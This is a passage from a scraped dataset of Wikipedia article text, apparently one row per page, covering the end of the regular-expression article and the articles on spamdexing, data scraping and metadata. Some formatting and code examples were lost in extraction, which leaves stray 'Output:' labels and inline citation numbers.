techniques such as the reverse scan. 53 GNU grep, which supports a wide variety of POSIX syntaxes and extensions, uses BM for a first-pass prefiltering, and then uses an implicit DFA. Wu agrep, which implements approximate matching, combines the prefiltering into the DFA in BDM (backward DAWG matching). NR-grep's BNDM extends the BDM technique with Shift-Or bit-level parallelism. 54 A few theoretical alternatives to backtracking for backreferences exist, and their "exponents" are tamer in that they are only related to the number of backreferences, a fixed property of some regexp languages such as POSIX. One naive method that duplicates a non-backtracking NFA for each backreference note has a complexity of O ( n 2 k 2 ) displaystyle mathrm O (n 2k 2 ) time and O ( n 2 k 1 ) displaystyle mathrm O (n 2k 1 ) space for a haystack of length n and k backreferences in the RegExp. 55 A very recent theoretical work based on memory automata gives a tighter bound based on "active" variable nodes used, and a polynomial possibility for some backreferenced regexps. 56 In theoretical terms, any token set can be matched by regular expressions as long as it is pre-defined. In terms of historical implementations, regexes were originally written to use ASCII characters as their token set though regex libraries have supported numerous other character sets. Many modern regex engines offer at least some support for Unicode. In most respects it makes no difference what the character set is, but some issues do arise when extending regexes to support Unicode. Most general-purpose programming languages support regex capabilities, either natively or via libraries. Comprehensive support is included in: Regexes are useful in a wide variety of text processing tasks, and more generally string processing, where the data need not be textual. Common applications include data validation, data scraping (especially web scraping), data wrangling, simple parsing, the production of syntax highlighting systems, and many other tasks. While regexes would be useful on Internet search engines, processing them across the entire database could consume excessive computer resources depending on the complexity and design of the regex. Although in many cases system administrators can run regex-based queries internally, most search engines do not offer regex support to the public. Notable exceptions include Google Code Search and Exalead. However, Google Code Search was shut down in January 2012. 69 The specific syntax rules vary depending on the specific implementation, programming language, or library in use. Additionally, the functionality of regex implementations can vary between versions. Because regexes can be difficult to both explain and understand without examples, interactive websites for testing regexes are a useful resource for learning regexes by experimentation. This section provides a basic description of some of the properties of regexes by way of illustration. The following conventions are used in the examples. 70 Also worth noting is that these regexes are all Perl-like syntax. Standard POSIX regular expressions are different. Unless otherwise indicated, the following examples conform to the Perl programming language, release 5.8.8, January 31, 2006. This means that other implementations may lack support for some parts of the syntax shown here (e.g. basic vs. extended regex, ( ) vs. (), or lack of d instead of POSIX :digit: ). The syntax and conventions used in these examples coincide with that of other programming environments as well. 71 Output: Output: Output: Output: Output: Output: Output: Output: Output: ( w w W w w W). Output: in Unicode, 58 where the Alphabetic property contains more than Latin letters, and the Decimal Number property contains more than Arab digits. Output: in Unicode. Output: Output: Output: Output: Output: Output: Output: Output: Output: Output: Regular expressions can often be created ("induced" or "learned") based on a set of example strings. This is known as the induction of regular languages and is part of the general problem of grammar induction in computational learning theory. Formally, given examples of strings in a regular language, and perhaps also given examples of strings not in that regular language, it is possible to induce a grammar for the language, i.e., a regular expression that generates that language. Not all regular languages can be induced in this way (see language identification in the limit), but many can. For example, the set of examples 1, 10, 100 , and negative set (of counterexamples) 11, 1001, 101, 0 can be used to induce the regular expression 1 0 (1 followed by zero or more 0s). |
567 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Spamdexing | Spamdexing (also known as search engine spam, search engine poisoning, black-hat search engine optimization, search spam or web spam) 1 is the deliberate manipulation of search engine indexes. It involves a number of methods, such as link building and repeating unrelated phrases, to manipulate the relevance or prominence of resources indexed in a manner inconsistent with the purpose of the indexing system. 2 3 Spamdexing could be considered to be a part of search engine optimization, 4 although there are many SEO methods that improve the quality and appearance of the content of web sites and serve content useful to many users. 5 Search engines use a variety of algorithms to determine relevancy ranking. Some of these include determining whether the search term appears in the body text or URL of a web page. Many search engines check for instances of spamdexing and will remove suspect pages from their indexes. Also, search-engine operators can quickly block the results listing from entire websites that use spamdexing, perhaps in response to user complaints of false matches. The rise of spamdexing in the mid 1990s made the leading search engines of the time less useful. Using unethical methods to make websites rank higher in search engine results than they otherwise would is commonly referred to in the SEO (search engine optimization) industry as "black-hat SEO". 6 These methods are more focused on breaking the search-engine-promotion rules and guidelines. In addition to this, the perpetrators run the risk of their websites being severely penalized by the Google Panda and Google Penguin search-results ranking algorithms. 7 Common spamdexing techniques can be classified into two broad classes: content spam 5 (term spam) and link spam. 3 The earliest known reference 2 to the term spamdexing is by Eric Convey in his article "Porn sneaks way back on Web", The Boston Herald, May 22, 1996, where he said: The problem arises when site operators load their Web pages with hundreds of extraneous terms so search engines will list them among legitimate addresses. The process is called "spamdexing, a combination of spamming—the Internet term for sending users unsolicited information—and "indexing. 2 These techniques involve altering the logical view that a search engine has over the page's contents. They all aim at variants of the vector space model for information retrieval on text collections. Keyword stuffing involves the calculated placement of keywords within a page to raise the keyword count, variety, and density of the page. This is useful to make a page appear to be relevant for a web crawler in a way that makes it more likely to be found. Example: A promoter of a Ponzi scheme owns a site advertising a scam and wants to attract people to it. The scammer places hidden text appropriate for a fan page of a popular music group on the page, hoping that the page will be listed as a fan site and receive many visits from music lovers. Older versions of indexing programs simply counted how often a keyword appeared, and used that to determine relevance levels. Most modern search engines have the ability to analyze a page for keyword stuffing and determine whether the frequency is consistent with other sites created specifically to attract search engine traffic. Also, large webpages are truncated, so that massive dictionary lists cannot be indexed on a single webpage. citation needed Unrelated hidden text is disguised by making it the same color as the background, using a tiny font size, or hiding it within HTML code such as "no frame" sections, alt attributes, zero-sized DIVs, and "no script" sections. People manually screening red-flagged websites for a search-engine company might temporarily or permanently block an entire website for having invisible text on some of its pages. However, hidden text is not always spamdexing: it can also be used to enhance accessibility. 8 This involves repeating keywords in the meta tags, and using meta keywords that are unrelated to the site's content. This tactic has been ineffective. Google declared that it doesn't use the keywords meta tag in its online search ranking in September 2009. 9 "Gateway" or doorway pages are low-quality web pages created with very little content, which are instead stuffed with very similar keywords and phrases. They are designed to rank highly within the search results, but serve no purpose to visitors looking for information. A doorway page will generally have "click here to enter" on the page; autoforwarding can also be used for this purpose. In 2006, Google ousted vehicle manufacturer BMW for using "doorway pages" to the company's German site, BMW.de. 10 Scraper sites are created using various programs designed to "scrape" search-engine results pages or other sources of content and create "content" for a website. citation needed The specific presentation of content on these sites is unique, but is merely an amalgamation of content taken from other sources, often without permission. Such websites are generally full of advertising (such as pay-per-click ads), or they redirect the user to other sites. It is even feasible for scraper sites to outrank original websites for their own information and organization names. Article spinning involves rewriting existing articles, as opposed to merely scraping content from other sites, to avoid penalties imposed by search engines for duplicate content. This process is undertaken by hired writers citation needed or automated using a thesaurus database or an artificial neural network. Similarly to article spinning, some sites use machine translation to render their content in several languages, with no human editing, resulting in unintelligible texts that nonetheless continue to be indexed by search engines, thereby attracting traffic. Link spam is defined as links between pages that are present for reasons other than merit. 11 Link spam takes advantage of link-based ranking algorithms, which gives websites higher rankings the more other highly ranked websites link to it. These techniques also aim at influencing other link-based ranking techniques such as the HITS algorithm. citation needed Link farms are tightly-knit networks of websites that link to each other for the sole purpose of exploiting the search engine ranking algorithms. These are also known facetiously as mutual admiration societies. 12 Use of links farms has greatly reduced with the launch of Google's first Panda Update in February 2011, which introduced significant improvements in its spam-detection algorithm. Blog networks (PBNs) are a group of authoritative websites used as a source of contextual links that point to the owner's main website to achieve higher search engine ranking. Owners of PBN websites use expired domains or auction domains that have backlinks from high-authority websites. Google targeted and penalized PBN users on several occasions with several massive deindexing campaigns since 2014. 13 Putting hyperlinks where visitors will not see them is used to increase link popularity. Highlighted link text can help rank a webpage higher for matching that phrase. A Sybil attack is the forging of multiple identities for malicious intent, named after the famous dissociative identity disorder patient and the book about her that shares her name, "Sybil". 14 15 A spammer may create multiple web sites at different domain names that all link to each other, such as fake blogs (known as spam blogs). Spam blogs are blogs created solely for commercial promotion and the passage of link authority to target sites. Often these "splogs" are designed in a misleading manner that will give the effect of a legitimate website but upon close inspection will often be written using spinning software or be very poorly written with barely readable content. They are similar in nature to link farms. 16 17 Guest blog spam is the process of placing guest blogs on websites for the sole purpose of gaining a link to another website or websites. Unfortunately, these are often confused with legitimate forms of guest blogging with other motives than placing links. This technique was made famous by Matt Cutts, who publicly declared "war" against this form of link spam. 18 Some link spammers utilize expired domain crawler software or monitor DNS records for domains that will expire soon, then buy them when they expire and replace the pages with links to their pages. However, it is possible but not confirmed that Google resets the link data on expired domains. citation needed To maintain all previous Google ranking data for the domain, it is advisable that a buyer grab the domain before it is "dropped". Some of these techniques may be applied for creating a Google bomb—that is, to cooperate with other users to boost the ranking of a particular page for a particular query. Web sites that can be edited by users can be used by spamdexers to insert links to spam sites if the appropriate anti-spam measures are not taken. Automated spambots can rapidly make the user-editable portion of a site unusable. Programmers have developed a variety of automated spam prevention techniques to block or at least slow down spambots. Spam in blogs is the placing or solicitation of links randomly on other sites, placing a desired keyword into the hyperlinked text of the inbound link. Guest books, forums, blogs, and any site that accepts visitors' comments are particular targets and are often victims of drive-by spamming where automated software creates nonsense posts with links that are usually irrelevant and unwanted. Comment spam is a form of link spam that has arisen in web pages that allow dynamic user editing such as wikis, blogs, and guestbooks. It can be problematic because agents can be written that automatically randomly select a user edited web page, such as a Wikipedia article, and add spamming links. 19 Wiki spam is when a spammer uses the open editability of wiki systems to place links from the wiki site to the spam site. Referrer spam takes place when a spam perpetrator or facilitator accesses a web page (the referee), by following a link from another web page (the referrer), so that the referee is given the address of the referrer by the person's Internet browser. Some websites have a referrer log which shows which pages link to that site. By having a robot randomly access many sites enough times, with a message or specific address given as the referrer, that message or Internet address then appears in the referrer log of those sites that have referrer logs. Since some Web search engines base the importance of sites on the number of different sites linking to them, referrer-log spam may increase the search engine rankings of the spammer's sites. Also, site administrators who notice the referrer log entries in their logs may follow the link back to the spammer's referrer page. Because of the large amount of spam posted to user-editable webpages, Google proposed a "nofollow" tag that could be embedded with links. A link-based search engine, such as Google's PageRank system, will not use the link to increase the score of the linked website if the link carries a nofollow tag. This ensures that spamming links to user-editable websites will not raise the sites ranking with search engines. Nofollow is used by several major websites, including Wordpress, Blogger and Wikipedia. citation needed A mirror site is the hosting of multiple websites with conceptually similar content but using different URLs. Some search engines give a higher rank to results where the keyword searched for appears in the URL. URL redirection is the taking of the user to another page without his or her intervention, e.g., using META refresh tags, Flash, JavaScript, Java or Server side redirects. However, 301 Redirect, or permanent redirect, is not considered as a malicious behavior. Cloaking refers to any of several means to serve a page to the search-engine spider that is different from that seen by human users. It can be an attempt to mislead search engines regarding the content on a particular web site. Cloaking, however, can also be used to ethically increase accessibility of a site to users with disabilities or provide human users with content that search engines aren't able to process or parse. It is also used to deliver content based on a user's location; Google itself uses IP delivery, a form of cloaking, to deliver results. Another form of cloaking is code swapping, i.e., optimizing a page for top ranking and then swapping another page in its place once a top ranking is achieved. Google refers to these type of redirects as Sneaky Redirects. 20 Spamdexed pages are sometimes eliminated from search results by the search engine. Users can employ search operators for filtering. For Google, a keyword preceded by (minus) will omit sites that contains the keyword in their pages or in the URL of the pages from search result. As an example, the search unwanted site will eliminate sites that contains word unwanted site in their pages and the pages whose URL contains unwanted site . Users could also use the Google Chrome extension "Personal Blocklist (by Google) , launched by Google in 2011 as part of countermeasures against content farming. 21 Via the extension, users could block a specific page, or set of pages from appearing in their search results. As of 2021, the original extension appears to be removed, although similar-functioning extensions may be used. Possible solutions to overcome search-redirection poisoning redirecting to illegal internet pharmacies include notification of operators of vulnerable legitimate domains. Further, manual evaluation of SERPs, previously published link-based and content-based algorithms as well as tailor-made automatic detection and classification engines can be used as benchmarks in the effective identification of pharma scam campaigns. 22 |
568 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Data_scraping#Description | Data scraping is a technique where a computer program extracts data from human-readable output coming from another program. Normally, data transfer between programs is accomplished using data structures suited for automated processing by computers, not people. Such interchange formats and protocols are typically rigidly structured, well-documented, easily parsed, and minimize ambiguity. Very often, these transmissions are not human-readable at all. Thus, the key element that distinguishes data scraping from regular parsing is that the output being scraped is intended for display to an end-user, rather than as an input to another program. It is therefore usually neither documented nor structured for convenient parsing. Data scraping often involves ignoring binary data (usually images or multimedia data), display formatting, redundant labels, superfluous commentary, and other information which is either irrelevant or hinders automated processing. Data scraping is most often done either to interface to a legacy system, which has no other mechanism which is compatible with current hardware, or to interface to a third-party system which does not provide a more convenient API. In the second case, the operator of the third-party system will often see screen scraping as unwanted, due to reasons such as increased system load, the loss of advertisement revenue, or the loss of control of the information content. Data scraping is generally considered an ad hoc, inelegant technique, often used only as a "last resort" when no other mechanism for data interchange is available. Aside from the higher programming and processing overhead, output displays intended for human consumption often change structure frequently. Humans can cope with this easily, but a computer program will fail. Depending on the quality and the extent of error handling logic present in the computer, this failure can result in error messages, corrupted output or even program crashes. However, setting up a data scraping pipeline nowadays is straightforward, requiring minimal programming effort to meet practical needs (especially in biomedical data integration). 1 Although the use of physical "dumb terminal" IBM 3270s is slowly diminishing, as more and more mainframe applications acquire Web interfaces, some Web applications merely continue to use the technique of screen scraping to capture old screens and transfer the data to modern front-ends. 2 Screen scraping is normally associated with the programmatic collection of visual data from a source, instead of parsing data as in web scraping. Originally, screen scraping referred to the practice of reading text data from a computer display terminal's screen. This was generally done by reading the terminal's memory through its auxiliary port, or by connecting the terminal output port of one computer system to an input port on another. The term screen scraping is also commonly used to refer to the bidirectional exchange of data. This could be the simple cases where the controlling program navigates through the user interface, or more complex scenarios where the controlling program is entering data into an interface meant to be used by a human. As a concrete example of a classic screen scraper, consider a hypothetical legacy system dating from the 1960s—the dawn of computerized data processing. Computer to user interfaces from that era were often simply text-based dumb terminals which were not much more than virtual teleprinters (such systems are still in use today update , for various reasons). The desire to interface such a system to more modern systems is common. A robust solution will often require things no longer available, such as source code, system documentation, APIs, or programmers with experience in a 50 year-old computer system. In such cases, the only feasible solution may be to write a screen scraper that "pretends" to be a user at a terminal. The screen scraper might connect to the legacy system via Telnet, emulate the keystrokes needed to navigate the old user interface, process the resulting display output, extract the desired data, and pass it on to the modern system. A sophisticated and resilient implementation of this kind, built on a platform providing the governance and control required by a major enterprise—e.g. change control, security, user management, data protection, operational audit, load balancing, and queue management, etc.—could be said to be an example of robotic process automation software, called RPA or RPAAI for self-guided RPA 2.0 based on artificial intelligence. In the 1980s, financial data providers such as Reuters, Telerate, and Quotron displayed data in 24 80 format intended for a human reader. Users of this data, particularly investment banks, wrote applications to capture and convert this character data as numeric data for inclusion into calculations for trading decisions without re-keying the data. The common term for this practice, especially in the United Kingdom, was page shredding, since the results could be imagined to have passed through a paper shredder. Internally Reuters used the term 'logicized' for this conversion process, running a sophisticated computer system on VAX VMS called the Logicizer. 3 More modern screen scraping techniques include capturing the bitmap data from the screen and running it through an OCR engine, or for some specialised automated testing systems, matching the screen's bitmap data against expected results. 4 This can be combined in the case of GUI applications, with querying the graphical controls by programmatically obtaining references to their underlying programming objects. A sequence of screens is automatically captured and converted into a database. Another modern adaptation to these techniques is to use, instead of a sequence of screens as input, a set of images or PDF files, so there are some overlaps with generic "document scraping" and report mining techniques. There are many tools that can be used for screen scraping. 5 Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. Because of this, tool kits that scrape web content were created. A web scraper is an API or tool to extract data from a website. 6 Companies like Amazon AWS and Google provide web scraping tools, services, and public data available free of cost to end-users. Newer forms of web scraping involve listening to data feeds from web servers. For example, JSON is commonly used as a transport storage mechanism between the client and the webserver. A web scraper uses a website's URL to extract data, and stores this data for subsequent analysis. This method of web scraping enables the extraction of data in an efficient and accurate manner. 7 Recently, companies have developed web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate the human processing that occurs when viewing a webpage to automatically extract useful information. 8 9 Large websites usually use defensive algorithms to protect their data from web scrapers and to limit the number of requests an IP or IP network may send. This has caused an ongoing battle between website developers and scraping developers. 10 Report mining is the extraction of data from human-readable computer reports. Conventional data extraction requires a connection to a working source system, suitable connectivity standards or an API, and usually complex querying. By using the source system's standard reporting options, and directing the output to a spool file instead of to a printer, static reports can be generated suitable for offline analysis via report mining. 11 This approach can avoid intensive CPU usage during business hours, can minimise end-user licence costs for ERP customers, and can offer very rapid prototyping and development of custom reports. Whereas data scraping and web scraping involve interacting with dynamic output, report mining involves extracting data from files in a human-readable format, such as HTML, PDF, or text. These can be easily generated from almost any system by intercepting the data feed to a printer. This approach can provide a quick and simple route to obtaining data without the need to program an API to the source system. |
569 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Metadata | Metadata (or metainformation) is "data that provides information about other data", 1 but not the content of the data itself, such as the text of a message or the image itself. 2 There are many distinct types of metadata, including: Metadata is not strictly bound to one of these categories, as it can describe a piece of data in many other ways. Metadata has various purposes. It can help users find relevant information and discover resources. It can also help organize electronic resources, provide digital identification, and archive and preserve resources. Metadata allows users to access resources by "allowing resources to be found by relevant criteria, identifying resources, bringing similar resources together, distinguishing dissimilar resources, and giving location information". 8 Metadata of telecommunication activities including Internet traffic is very widely collected by various national governmental organizations. This data is used for the purposes of traffic analysis and can be used for mass surveillance. 9 Metadata was traditionally used in the card catalogs of libraries until the 1980s when libraries converted their catalog data to digital databases. 10 In the 2000s, as data and information were increasingly stored digitally, this digital data was described using metadata standards. 11 The first description of "meta data" for computer systems is purportedly noted by MIT's Center for International Studies experts David Griffel and Stuart McIntosh in 1967: "In summary then, we have statements in an object language about subject descriptions of data and token codes for the data. We also have statements in a meta language describing the data relationships and transformations, and ought is relations between norm and data. 12 Unique metadata standards exist for different disciplines (e.g., museum collections, digital audio files, websites, etc.). Describing the contents and context of data or data files increases its usefulness. For example, a web page may include metadata specifying what software language the page is written in (e.g., HTML), what tools were used to create it, what subjects the page is about, and where to find more information about the subject. This metadata can automatically improve the reader's experience and make it easier for users to find the web page online. 13 A CD may include metadata providing information about the musicians, singers, and songwriters whose work appears on the disc. In many countries, government organizations routinely store metadata about emails, telephone calls, web pages, video traffic, IP connections, and cell phone locations. citation needed Metadata means "data about data". Metadata is defined as the data providing information about one or more aspects of the data; it is used to summarize basic information about data that can make tracking and working with specific data easier. 14 Some examples include: For example, a digital image may include metadata that describes the size of the image, its color depth, resolution, when it was created, the shutter speed, and other data. 15 A text document's metadata may contain information about how long the document is, who the author is, when the document was written, and a short summary of the document. Metadata within web pages can also contain descriptions of page content, as well as key words linked to the content. 16 These links are often called "Metatags", which were used as the primary factor in determining order for a web search until the late 1990s. 16 The reliance on metatags in web searches was decreased in the late 1990s because of "keyword stuffing", 16 whereby metatags were being largely misused to trick search engines into thinking some websites had more relevance in the search than they really did. 16 Metadata can be stored and managed in a database, often called a metadata registry or metadata repository. 17 However, without context and a point of reference, it might be impossible to identify metadata just by looking at it. 18 For example: by itself, a database containing several numbers, all 13 digits long could be the results of calculations or a list of numbers to plug into an equation without any other context, the numbers themselves can be perceived as the data. But if given the context that this database is a log of a book collection, those 13 digit numbers may now be identified as ISBNs information that refers to the book, but is not itself the information within the book. The term "metadata" was coined in 1968 by Philip Bagley, in his book "Extension of Programming Language Concepts" where it is clear that he uses the term in the ISO 11179 "traditional" sense, which is "structural metadata" i.e. "data about the containers of data"; rather than the alternative sense "content about individual instances of data content" or metacontent, the type of data usually found in library catalogs. 19 20 Since then the fields of information management, information science, information technology, librarianship, and GIS have widely adopted the term. In these fields, the word metadata is defined as "data about data". 21 While this is the generally accepted definition, various disciplines have adopted their own more specific explanations and uses of the term. Slate reported in 2013 that the United States government's interpretation of "metadata" could be broad, and might include message content such as the subject lines of emails. 22 While the metadata application is manifold, covering a large variety of fields, there are specialized and well-accepted models to specify types of metadata. Bretherton Singley (1994) distinguish between two distinct classes: structural control metadata and guide metadata. 23 Structural metadata describes the structure of database objects such as tables, columns, keys and indexes. Guide metadata helps humans find specific items and is usually expressed as a set of keywords in a natural language. According to Ralph Kimball, metadata can be divided into three categories: technical metadata (or internal metadata), business metadata (or external metadata), and process metadata. NISO distinguishes three types of metadata: descriptive, structural, and administrative. 21 Descriptive metadata is typically used for discovery and identification, as information to search and locate an object, such as title, authors, subjects, keywords, and publisher. Structural metadata describes how the components of an object are organized. An example of structural metadata would be how pages are ordered to form chapters of a book. Finally, administrative metadata gives information to help manage the source. Administrative metadata refers to the technical information, such as file type, or when and how the file was created. Two sub-types of administrative metadata are rights management metadata and preservation metadata. Rights management metadata explains intellectual property rights, while preservation metadata contains information to preserve and save a resource. 8 Statistical data repositories have their own requirements for metadata in order to describe not only the source and quality of the data 6 but also what statistical processes were used to create the data, which is of particular importance to the statistical community in order to both validate and improve the process of statistical data production. 7 An additional type of metadata beginning to be more developed is accessibility metadata. Accessibility metadata is not a new concept to libraries; however, advances in universal design have raised its profile. 24 : 213 214 Projects like Cloud4All and GPII identified the lack of common terminologies and models to describe the needs and preferences of users and information that fits those needs as a major gap in providing universal access solutions. 24 : 210 211 Those types of information are accessibility metadata. 24 : 214 Schema.org has incorporated several accessibility properties based on IMS Global Access for All Information Model Data Element Specification. 24 : 214 The Wiki page WebSchemas Accessibility lists several properties and their values. While the efforts to describe and standardize the varied accessibility needs of information seekers are beginning to become more robust, their adoption into established metadata schemas has not been as developed. For example, while Dublin Core (DC)'s "audience" and MARC 21's "reading level" could be used to identify resources suitable for users with dyslexia and DC's "format" could be used to identify resources available in braille, audio, or large print formats, there is more work to be done. 24 : 214 Metadata (metacontent) or, more correctly, the vocabularies used to assemble metadata (metacontent) statements, is typically structured according to a standardized concept using a well-defined metadata scheme, including metadata standards and metadata models. Tools such as controlled vocabularies, taxonomies, thesauri, data dictionaries, and metadata registries can be used to apply further standardization to the metadata. Structural metadata commonality is also of paramount importance in data model development and in database design. Metadata (metacontent) syntax refers to the rules created to structure the fields or elements of metadata (metacontent). 25 A single metadata scheme may be expressed in a number of different markup or programming languages, each of which requires a different syntax. For example, Dublin Core may be expressed in plain text, HTML, XML, and RDF. 26 A common example of (guide) metacontent is the bibliographic classification, the subject, the Dewey Decimal class number. There is always an implied statement in any "classification" of some object. To classify an object as, for example, Dewey class number 514 (Topology) (i.e. books having the number 514 on their spine) the implied statement is: book subject heading 514 . This is a subject-predicate-object triple, or more importantly, a class-attribute-value triple. The first 2 elements of the triple (class, attribute) are pieces of some structural metadata having a defined semantic. The third element is a value, preferably from some controlled vocabulary, some reference (master) data. The combination of the metadata and master data elements results in a statement which is a metacontent statement i.e. "metacontent metadata master data". All of these elements can be thought of as "vocabulary". Both metadata and master data are vocabularies that can be assembled into metacontent statements. There are many sources of these vocabularies, both meta and master data: UML, EDIFACT, XSD, Dewey UDC LoC, SKOS, ISO 25964, Pantone, Linnaean Binomial Nomenclature, etc. Using controlled vocabularies for the components of metacontent statements, whether for indexing or finding, is endorsed by ISO 25964: "If both the indexer and the searcher are guided to choose the same term for the same concept, then relevant documents will be retrieved. 27 This is particularly relevant when considering search engines of the internet, such as Google. The process indexes pages and then matches text strings using its complex algorithm; there is no intelligence or "inferencing" occurring, just the illusion thereof. Metadata schemata can be hierarchical in nature where relationships exist between metadata elements and elements are nested so that parent-child relationships exist between the elements. An example of a hierarchical metadata schema is the IEEE LOM schema, in which metadata elements may belong to a parent metadata element. Metadata schemata can also be one-dimensional, or linear, where each element is completely discrete from other elements and classified according to one dimension only. An example of a linear metadata schema is the Dublin Core schema, which is one-dimensional. Metadata schemata are often 2 dimensional, or planar, where each element is completely discrete from other elements but classified according to 2 orthogonal dimensions. 28 The degree to which the data or metadata is structured is referred to as "granularity". "Granularity" refers to how much detail is provided. Metadata with a high granularity allows for deeper, more detailed, and more structured information and enables a greater level of technical manipulation. A lower level of granularity means that metadata can be created for considerably lower costs but will not provide as detailed information. The major impact of granularity is not only on creation and capture, but moreover on maintenance costs. As soon as the metadata structures become outdated, so too is the access to the referred data. Hence granularity must take into account the effort to create the metadata as well as the effort to maintain it. In all cases where the metadata schemata exceed the planar depiction, some type of hypermapping is required to enable display and view of metadata according to chosen aspect and to serve special views. Hypermapping frequently applies to layering of geographical and geological information overlays. 29 International standards apply to metadata. Much work is being accomplished in the national and international standards communities, especially ANSI (American National Standards Institute) and ISO (International Organization for Standardization) to reach a consensus on standardizing metadata and registries. The core metadata registry standard is ISO IEC 11179 Metadata Registries (MDR), the framework for the standard is described in ISO IEC 11179 1:2004. 30 A new edition of Part 1 is in its final stage for publication in 2015 or early 2016. It has been revised to align with the current edition of Part 3, ISO IEC 11179 3:2013 31 which extends the MDR to support the registration of Concept Systems. (see ISO IEC 11179). This standard specifies a schema for recording both the meaning and technical structure of the data for unambiguous usage by humans and computers. ISO IEC 11179 standard refers to metadata as information objects about data, or "data about data". In ISO IEC 11179 Part 3, the information objects are data about Data Elements, Value Domains, and other reusable semantic and representational information objects that describe the meaning and technical details of a data item. This standard also prescribes the details for a metadata registry, and for registering and administering the information objects within a Metadata Registry. ISO IEC 11179 Part 3 also has provisions for describing compound structures that are derivations of other data elements, for example through calculations, collections of one or more data elements, or other forms of derived data. While this standard describes itself originally as a "data element" registry, its purpose is to support describing and registering metadata content independently of any particular application, lending the descriptions to being discovered and reused by humans or computers in developing new applications, databases, or for analysis of data collected in accordance with the registered metadata content. This standard has become the general basis for other kinds of metadata registries, reusing and extending the registration and administration portion of the standard. The Geospatial community has a tradition of specialized geospatial metadata standards, particularly building on traditions of map- and image-libraries and catalogs. Formal metadata is usually essential for geospatial data, as common text-processing approaches are not applicable. The Dublin Core metadata terms are a set of vocabulary terms that can be used to describe resources for the purposes of discovery. The original set of 15 classic 32 metadata terms, known as the Dublin Core Metadata Element Set 33 are endorsed in the following standards documents: The W3C Data Catalog Vocabulary (DCAT) 37 is an RDF vocabulary that supplements Dublin Core with classes for Dataset, Data Service, Catalog, and Catalog Record. DCAT also uses elements from FOAF, PROV-O, and OWL-Time. DCAT provides an RDF model to support the typical structure of a catalog that contains records, each describing a dataset or service. Although not a standard, Microformat (also mentioned in the section metadata on the internet below) is a web-based approach to semantic markup which seeks to re-use existing HTML XHTML tags to convey metadata. Microformat follows XHTML and HTML standards but is not a standard in itself. One advocate of microformats, Tantek elik, characterized a problem with alternative approaches: Here's a new language we want you to learn, and now you need to output these additional files on your server. It's a hassle. (Microformats) lower the barrier to entry. 38 Metadata may be written into a digital photo file that will identify who owns it, copyright and contact information, what brand or model of camera created the file, along with exposure information (shutter speed, f-stop, etc.) and descriptive information, such as keywords about the photo, making the file or image searchable on a computer and or the Internet. Some metadata is created by the camera such as, color space, color channels, exposure time, and aperture (EXIF), while some is input by the photographer and or software after downloading to a computer. 39 Most digital cameras write metadata about the model number, shutter speed, etc., and some enable you to edit it; 40 this functionality has been available on most Nikon DSLRs since the Nikon D3, on most new Canon cameras since the Canon EOS 7D, and on most Pentax DSLRs since the Pentax K 3. Metadata can be used to make organizing in post-production easier with the use of key-wording. Filters can be used to analyze a specific set of photographs and create selections on criteria like rating or capture time. On devices with geolocation capabilities like GPS (smartphones in particular), the location the photo was taken from may also be included. Photographic Metadata Standards are governed by organizations that develop the following standards. They include, but are not limited to: Information on the times, origins and destinations of phone calls, electronic messages, instant messages, and other modes of telecommunication, as opposed to message content, is another form of metadata. Bulk collection of this call detail record metadata by intelligence agencies has proven controversial after disclosures by Edward Snowden of the fact that certain Intelligence agencies such as the NSA had been (and perhaps still are) keeping online metadata on millions of internet users for up to a year, regardless of whether or not they ever were persons of interest to the agency. Metadata is particularly useful in video, where information about its contents (such as transcripts of conversations and text descriptions of its scenes) is not directly understandable by a computer, but where an efficient search of the content is desirable. This is particularly useful in video applications such as Automatic Number Plate Recognition and Vehicle Recognition Identification software, wherein license plate data is saved and used to create reports and alerts. 42 There are 2 sources in which video metadata is derived: (1) operational gathered metadata, that is information about the content produced, such as the type of equipment, software, date, and location; (2) human-authored metadata, to improve search engine visibility, discoverability, audience engagement, and providing advertising opportunities to video publishers. 43 Avid's MetaSync and Adobe's Bridge are examples of professional video editing software with access to metadata. 44 Geospatial metadata relates to Geographic Information Systems (GIS) files, maps, images, and other data that is location-based. Metadata is used in GIS to document the characteristics and attributes of geographic data, such as database files and data that is developed within a GIS. It includes details like who developed the data, when it was collected, how it was processed, and what formats it's available in, and then delivers the context for the data to be used effectively. 45 Metadata can be created either by automated information processing or by manual work. Elementary metadata captured by computers can include information about when an object was created, who created it, when it was last updated, file size, and file extension. In this context an object refers to any of the following: A metadata engine collects, stores and analyzes information about data and metadata in use within a domain. 46 Data virtualization emerged in the 2000s as the new software technology to complete the virtualization "stack" in the enterprise. Metadata is used in data virtualization servers which are enterprise infrastructure components, alongside database and application servers. Metadata in these servers is saved as persistent repository and describe business objects in various enterprise systems and applications. Structural metadata commonality is also important to support data virtualization. Standardization and harmonization work has brought advantages to industry efforts to build metadata systems in the statistical community. 47 48 Several metadata guidelines and standards such as the European Statistics Code of Practice 49 and ISO 17369:2013 (Statistical Data and Metadata Exchange or SDMX) 47 provide key principles for how businesses, government bodies, and other entities should manage statistical data and metadata. Entities such as Eurostat, 50 European System of Central Banks, 50 and the U.S. Environmental Protection Agency 51 have implemented these and other such standards and guidelines with the goal of improving "efficiency when managing statistical business processes". 50 Metadata has been used in various ways as a means of cataloging items in libraries in both digital and analog formats. Such data helps classify, aggregate, identify, and locate a particular book, DVD, magazine, or any object a library might hold in its collection. 52 Until the 1980s, many library catalogs used 3x5 inch cards in file drawers to display a book's title, author, subject matter, and an abbreviated alpha-numeric string (call number) which indicated the physical location of the book within the library's shelves. The Dewey Decimal System employed by libraries for the classification of library materials by subject is an early example of metadata usage. The early paper catalog had information regarding whichever item was described on said card: title, author, subject, and a number as to where to find said item. 53 Beginning in the 1980s and 1990s, many libraries replaced these paper file cards with computer databases. These computer databases make it much easier and faster for users to do keyword searches. Another form of older metadata collection is the use by the US Census Bureau of what is known as the "Long Form". The Long Form asks questions that are used to create demographic data to find patterns of distribution. 54 Libraries employ metadata in library catalogues, most commonly as part of an Integrated Library Management System. Metadata is obtained by cataloging resources such as books, periodicals, DVDs, web pages or digital images. This data is stored in the integrated library management system, ILMS, using the MARC metadata standard. The purpose is to direct patrons to the physical or electronic location of items or areas they seek as well as to provide a description of the item s in question. More recent and specialized instances of library 